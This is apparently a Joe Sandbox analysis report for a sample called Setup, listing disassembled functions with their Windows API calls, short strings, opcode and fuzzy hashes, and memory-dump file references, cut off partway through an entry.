API String ID: 2299586839-1736944033
Opcode ID: 675af37a7142e942cd3cf8449a5179f5ffb5d934603f0a48af53ed3f3a20010c
Instruction ID: 4379c69ef16c8abd143ddbd14eb68ace78f4b1b5b1bed2c3392163f3899edeed
Opcode Fuzzy Hash: 675af37a7142e942cd3cf8449a5179f5ffb5d934603f0a48af53ed3f3a20010c
Instruction Fuzzy Hash: 91F0A432B14214EFEB10AB64DC46BBA73E8DB84315F110079E901DB181DA74AD058A90

Function 00730F90 Relevance: 3.0, APIs: 2, Instructions: 10COMMON

Download Yara Rule

APIs

__set_se_translator.LIBVCRUNTIME ref: 00730F95
SetUnhandledExceptionFilter.KERNEL32(Function_00162C50), ref: 00730FAB

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionFilterUnhandled__set_se_translator
String ID:
API String ID: 2480343447-0
Opcode ID: 894054e980366c7523672a84e943070fede5175f4b7154ed396c901cf3dee510
Instruction ID: 3632beadf8cbb12f8ead7ba7d83e2840d9c266f919689998e7102e2fc900f6fc
Opcode Fuzzy Hash: 894054e980366c7523672a84e943070fede5175f4b7154ed396c901cf3dee510
Instruction Fuzzy Hash: A1D02230A1C3447AE710ABA8EC863147B70A760704F000018E45A802A2C2E81AC6A7C3

Function 008A6970 Relevance: 2.9, Strings: 2, Instructions: 406COMMON

Download Yara Rule

Strings

&_', xrefs: 008A6987
0e+00, xrefs: 008A6BDD

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: 0e+00$&_'
API String ID: 0-1471730273
Opcode ID: 78a88aaedc8f7c5496db12b0134b2bfb3ab3ee3bdf5161d19a4474c5b7c848bc
Instruction ID: d4d1115cabc4340d7e6ff5ea6e7ca204c86f8fc137e013b3eb6247aea74decdf
Opcode Fuzzy Hash: 78a88aaedc8f7c5496db12b0134b2bfb3ab3ee3bdf5161d19a4474c5b7c848bc
Instruction Fuzzy Hash: 7ED1BF72B042098FDB08DF6DC8816AEF7E5FB89310F18823DE419D7794E734A9558B91

Function 008A6060 Relevance: 2.8, Strings: 2, Instructions: 334COMMON

Download Yara Rule

Strings

&_', xrefs: 008A6077, 008A6247
&_', xrefs: 008A607F, 008A61E1

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'$&_'
API String ID: 0-224754792
Opcode ID: ad8d41a63198a44949c4a4c24e05c5e36ee3abeb6941f414a302b80ba35a36b6
Instruction ID: 0af5aa48e40433ac282f557dcd18bc86062a70bca4ec441c898ec6cb2a8450c8
Opcode Fuzzy Hash: ad8d41a63198a44949c4a4c24e05c5e36ee3abeb6941f414a302b80ba35a36b6
Instruction Fuzzy Hash: E8B19571E001199FDF08DF68C955AAEBBF5FB88310F14812AE905EB395E774ED118B90

Function 008F2E50 Relevance: 1.9, Strings: 1, Instructions: 682COMMON

Download Yara Rule

Strings

&_', xrefs: 008F2E53

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'
API String ID: 0-2411122644
Opcode ID: 43648818c255af2f133ca477a6aea8ce53c0c1cbdc3e9fe33d379425916068f4
Instruction ID: f7abf877d18ba19e58c0030103217cf1e138c1ca054aedb535c0bf7178cf3b43
Opcode Fuzzy Hash: 43648818c255af2f133ca477a6aea8ce53c0c1cbdc3e9fe33d379425916068f4
Instruction Fuzzy Hash: E722C2B3B543104BD75CCE5DCCA23ADB2D3ABD4218B0E853DB48AC3342EA7DD9598685

Function 008B0480 Relevance: 1.8, Strings: 1, Instructions: 558COMMON

Download Yara Rule

Strings

&_', xrefs: 008B0494, 008B0847, 008B09D7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'
API String ID: 0-2411122644
Opcode ID: 4b718128bea28cc45084f1a1b3d3f367f593e7a3a9973d1066076207727a8433
Instruction ID: d247d90b9faaeeca3bb281c66ea5b24567e7bab6ab172a52b9fa577a28117d9b
Opcode Fuzzy Hash: 4b718128bea28cc45084f1a1b3d3f367f593e7a3a9973d1066076207727a8433
Instruction Fuzzy Hash: BF225772E002189FCB14DFA8C894AEEBBB5FF88710F158159E815BB391DB70AD418F94

Function 0091A45E Relevance: 1.7, Strings: 1, Instructions: 466COMMON

Download Yara Rule

Strings

&_', xrefs: 0091A474

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'
API String ID: 0-2411122644
Opcode ID: 615434229413dc3500bb4c4c92408812b834e390919fb58f07e9a2f1df78821e
Instruction ID: 662a37da3c5cd6213a7d04fb0a689fbe430defddd03e3310d63b6981c6f1bee2
Opcode Fuzzy Hash: 615434229413dc3500bb4c4c92408812b834e390919fb58f07e9a2f1df78821e
Instruction Fuzzy Hash: 7302D170B056098FCB24CF68C584AEEB7F6FF48324F248659E45A97291D735ACC2CB12

Function 0091A01F Relevance: 1.6, Strings: 1, Instructions: 399COMMON

Download Yara Rule

Strings

&_', xrefs: 0091A035

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'
API String ID: 0-2411122644
Opcode ID: 006f2c1c81672af4e0c33ea2fd9e433ee6828ceb01cf6d066b2de953c87c9d35
Instruction ID: adeefca8d065c0ab993ea36ae20a2399ee019f47f39e6467f02633d0d67d46e7
Opcode Fuzzy Hash: 006f2c1c81672af4e0c33ea2fd9e433ee6828ceb01cf6d066b2de953c87c9d35
Instruction Fuzzy Hash: B2E1F170B0660E9FCB25CF68C484AEEB7B9BF49310F144A19D46297691C739ACC6CB52

Function 0093495E Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(00934A90,00000001,00000000,?,-00000050,?,009350D3,00000000,?,?,?,00000055,?), ref: 009349D0

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 2d350ee24dea5039236bad160f88f5eed163d2132b0e841639f057bb4d25bdcc
Instruction ID: ef38500c124bcb0edff5890065e00adba71ad3b9d498354df286e5348ee973a9
Opcode Fuzzy Hash: 2d350ee24dea5039236bad160f88f5eed163d2132b0e841639f057bb4d25bdcc
Instruction Fuzzy Hash: B611253B2047059FDF189F39C8916BABB96FF80768F16452DE98687A40D371B842CB40

Function 00934F1B Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00934CAD,00000000,00000000,?), ref: 00934F47

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b4c34a8e9d9e5037bf66c724cbfe16f07fefd6ad0cead69984724cddce968cea
Instruction ID: 0a37694580090fdaac10e30c2f7dbf7ae37c0ba1b2915a473d854805a2c76f96
Opcode Fuzzy Hash: b4c34a8e9d9e5037bf66c724cbfe16f07fefd6ad0cead69984724cddce968cea
Instruction Fuzzy Hash: 6901F932B14116BBDB285A648D06BBA77ACDB80754F1A4428EC16E7180EA74FD41CE91

Function 009349F9 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(00934CF0,00000001,00000000,?,-00000050,?,0093509B,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00934A43

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 219b721071a33ff553a46a56af604c91a29f1b9acffe2b7144f00bdef6739a0f
Instruction ID: f395fc2b340a559a01080534b367c73774785b361d1971d3bc11ee1efa7a9b25
Opcode Fuzzy Hash: 219b721071a33ff553a46a56af604c91a29f1b9acffe2b7144f00bdef6739a0f
Instruction Fuzzy Hash: 1DF046362043085FDB249F799C81B7A7B99EFC0368F06402CF9458B680C2B1BC02CF44

Function 00934913 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(00934870,00000001,00000000,?,?,009350F5,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0093494A

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 7d8c8badb0640e860546e2dcf133c03bf5058d9c562957ced6931c2fbc2ad3a7
Instruction ID: 8d06dafffe7a68a6b1fd6bc384d99f3dac268ea0ff0572f55983dfb874393e2c
Opcode Fuzzy Hash: 7d8c8badb0640e860546e2dcf133c03bf5058d9c562957ced6931c2fbc2ad3a7
Instruction Fuzzy Hash: 30F0E53A30020557CB149F75DC5576BBF98EFC2B65F174059EE198B251C671E843CB90

Function 00710960 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,0070EFB8,?,?,?,?,?), ref: 007109B0

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 0a79d5c1a91611cfe6a2c526990fb4b14f2e7f2a49fffe207821a07e5ada7035
Instruction ID: daaf015a0265d35f5d0654fa088e8d0f2f52f2cf4264a6a75d9a1ebf7c96892f
Opcode Fuzzy Hash: 0a79d5c1a91611cfe6a2c526990fb4b14f2e7f2a49fffe207821a07e5ada7035
Instruction Fuzzy Hash: 0CF08C70115245DEF3148B1CC868AA9BBB6FB45352F4889E6E088C55E2C3BDEEC4DF94

Function 0092C2BF Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0092990A,?,20001004,00000000,00000002,?,?,00928F08), ref: 0092C2F3

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 11b0258ddbc0c8879f54b34d78bcb46f6b9b91f9de7ccadb6b4ab4d1fb1cf6a0
Instruction ID: f10fd348609a2c0cf15396d66b111fed5fcf0279646ab75a1834d81e2c7bf39e
Opcode Fuzzy Hash: 11b0258ddbc0c8879f54b34d78bcb46f6b9b91f9de7ccadb6b4ab4d1fb1cf6a0
Instruction Fuzzy Hash: 87E01A7560422CBBCF122FA0EC05AAE7B5AEF44761F014011FD15652658B729921AAD5

Function 006F87C0 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

&_', xrefs: 006F87E9

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'
API String ID: 0-2411122644
Opcode ID: ed37fc15e9f17780ed8f26bfba4396914cc801de57c12b88dc901cf8f179c0f9
Instruction ID: ab7b7cc3adc761cf673c67c0f8e83cbcf729584abb2afb192fdbcc5947a47ebe
Opcode Fuzzy Hash: ed37fc15e9f17780ed8f26bfba4396914cc801de57c12b88dc901cf8f179c0f9
Instruction Fuzzy Hash: 9771F7B1801B48CFE761CF78C94578ABBF0BB05324F148A5DD4A99B3D1D3B9A648CB91

Function 007DE5A0 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

&_', xrefs: 007DE5B6

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'
API String ID: 0-2411122644
Opcode ID: 048404b5c26d30e2fbafd1f28b68a6c52d7cdbdce1c03b4377904bbf3199818a
Instruction ID: 539eaba669e842eba54bbcac5ea90fd76986cdb474c043ac7ca1b5967f159d55
Opcode Fuzzy Hash: 048404b5c26d30e2fbafd1f28b68a6c52d7cdbdce1c03b4377904bbf3199818a
Instruction Fuzzy Hash: 0A4127B0901B85EED714CF69C10878AFBF0BF09318F20825EC4589B781D3B9A619CBD4

Function 007028D0 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

&_', xrefs: 007028E5

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'
API String ID: 0-2411122644
Opcode ID: c4179b3ded205601ee2e527e0cc7fd3c1b4c4cf8d75ad55148e8a9f17763c97c
Instruction ID: 1c838a6d5a848fa9568ea8d087ab32959529cc77178890570876a1b7b36dcd9f
Opcode Fuzzy Hash: c4179b3ded205601ee2e527e0cc7fd3c1b4c4cf8d75ad55148e8a9f17763c97c
Instruction Fuzzy Hash: F531BEB0405B84DEE721CF69C558787BFF0BB05718F108A4DD4E64BB91D3BAA648CB91

Function 006FB1B0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

&_', xrefs: 006FB1C6

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'
API String ID: 0-2411122644
Opcode ID: 7480770a94cb5d37a99c9138d4bc6aa5dc95438353ebfc72991a0d3f3d12659d
Instruction ID: 9b56a42c84473656e3dba1e831d6c24295e5b3c803a0e36a7d87c133e11630ed
Opcode Fuzzy Hash: 7480770a94cb5d37a99c9138d4bc6aa5dc95438353ebfc72991a0d3f3d12659d
Instruction Fuzzy Hash: E22159B5904348DFDB01CF58C80478ABBF4FB49318F21829ED414AB391D3BA9A06CB90

Function 0071ED10 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

&_', xrefs: 0071ED24

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: &_'
API String ID: 0-2411122644
Opcode ID: 6c95a0947f45c034e8984bbb9cf9bf0b7a3b50fd787bdac71be3173599df1c48
